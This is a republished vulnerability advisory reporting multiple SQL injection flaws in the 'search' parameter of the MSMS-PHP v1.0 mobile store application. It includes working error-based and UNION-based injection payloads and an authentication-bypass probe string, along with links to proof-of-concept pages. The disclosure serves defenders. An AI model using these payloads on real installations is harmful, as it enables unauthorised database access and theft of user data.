MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi

MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi
2024-3-14 05:57:52 Author: cxsecurity.com(查看原文) 阅读量:27 收藏

MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi

## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 03/13/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: This issue was generated by the BCheck: puncher_SQLi_bypass_authentication. There is a change in response when nu11secur1ty' or 1=1# is injected. Potential SQLi detected. Please confirm it manually after you check the POST, GET, or other requests... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. The `search` parameter is vulnerable for Multiple SQLi attacks. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: search (GET) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: p=products&search=-9068') OR 1 GROUP BY CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0 END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 9 columns Payload: p=products&search=-7515') UNION ALL SELECT 2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

文章来源: https://cxsecurity.com/issue/WLB-2024030028
如有侵权请联系:admin#unsafe.sh

MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.